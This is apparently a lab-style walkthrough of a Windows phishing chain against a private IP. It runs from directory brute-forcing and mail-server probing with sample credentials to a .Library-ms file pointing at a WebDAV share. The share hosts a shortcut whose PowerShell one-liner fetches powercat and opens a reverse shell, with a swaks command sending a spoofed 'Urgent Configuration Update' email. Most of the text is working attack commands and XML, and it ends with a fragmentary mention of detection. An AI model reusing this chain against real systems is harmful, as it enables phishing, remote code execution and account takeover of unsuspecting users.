Published on June 5, 2025
Windows Library files (.Library-ms) are XML-based manifests that aggregate folders from various locations. By pointing them to remote WebDAV shares hosting a malicious .lnk, you can trigger code execution when a user opens the library.
First, we brute-force common directories ending in PDF, TXT, ZIP, DOCX, DOC, DOCM:
gobuster dir \
-u http://192.168.152.199 \
-w /usr/share/wordlists/dirb/common.txt \
-x pdf,txt,zip,docx,doc,docmAmong the PDFs discovered, download and inspect metadata:
wget http://192.168.152.199/secret/document.pdf
exiftool document.pdf | grep -i emailIf the attacker embedded their address in the metadata, you’ll see something like:
Email: attacker@target.comWe connect with telnet to probe POP3, IMAP and SMTP and learn useful commands:
$ telnet 192.168.152.199 110
+OK POP3 server ready
USER test@target.com
+OK Send your password
PASS S3cr3t123
+OK Logged in.
STAT
+OK 3 560
LIST
+OK
1 200
2 180
3 180
.
RETR 1
+OK 200 octets
From: alice@target.com
Subject: Hello
Body...
.
QUIT
+OK POP3 server saying goodbye$ telnet 192.168.152.199 143
* OK hMailServer IMAP4 ready
A001 CAPABILITY
* CAPABILITY IMAP4rev1 IDLE NAMESPACE QUOTA UIDPLUS
A001 OK CAPABILITY completed
A002 LOGIN test@target.com S3cr3t123
A002 OK LOGIN completed
A003 LIST "" "*"
* LIST (\HasNoChildren) "/" "Inbox"
* LIST (\HasNoChildren) "/" "Sent Items"
A003 OK LIST completed
A004 SELECT "Inbox"
* 5 EXISTS
A004 OK [READ-WRITE] SELECT completed
A005 FETCH 1:* (BODY[HEADER.FIELDS (FROM SUBJECT DATE)])
* 1 FETCH (BODY[HEADER.FIELDS (FROM SUBJECT DATE) {…}
* 2 FETCH (BODY[HEADER.FIELDS (FROM SUBJECT DATE) {…}
A005 OK FETCH completed
A006 LOGOUT
* BYE Logging out
A006 OK LOGOUT completed$ telnet 192.168.152.199 25
220 ADMIN ESMTP
EHLO attacker.test
250-ADMIN
250-AUTH LOGIN
250 OK
AUTH LOGIN
<VXN…> ← base64(username)
<UGF…> ← base64(password)
235 authenticated.
MAIL FROM:<attacker@domain.com>
250 OK
RCPT TO:<victim@domain.com>
250 OK
DATA
Subject: Test Mail
Hello, this is a test.
.
250 OK id=12345
QUIT
221 GoodbyeCreate config.Library-ms pointing to your WebDAV:
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo><folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType></templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation><url>http://192.168.152.199/webdav</url></simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>Start a WebDAV server that serves your malicious .lnk shortcut:
mkdir -p /home/user/webdav
# place evil.lnk (with reverse-shell) into /home/user/webdav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/user/webdavYour evil.lnk contains a PowerShell one-liner reverse shell:
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.152.199:8000/powercat.ps1'); powercat -c 192.168.152.199 -p 4444 -e cmd"# On attacker machine:
cd /home/user/payloads
python3 -m http.server 8000
# In parallel, start a listener:
nc -lvnp 4444Send the .Library-ms as an email attachment along with a phishing body:
swaks \
--to malcolm.stew@target.com \
--from dwight.kruger@target.com \
--auth LOGIN \
--auth-user dwight.kruger@target.com \
--auth-password test \
--attach @config.Library-ms \
--header "Subject: Urgent Configuration Update" \
--body body.txt \
--server 192.168.152.199 \
--quit-after RCPT \
--timeout 10The victim sees a “Configuration Update” email and opens the attached library file, which points to your WebDAV and triggers the shortcut when clicked.
When config.Library-ms is opened, Explorer fetches http://192.168.152.199/webdav/evil.lnk. Clicking it launches the PowerShell reverse shell, connecting back to your nc -lvnp 4444. You then:
whoami
net user.Library-ms files and WebDAV activity.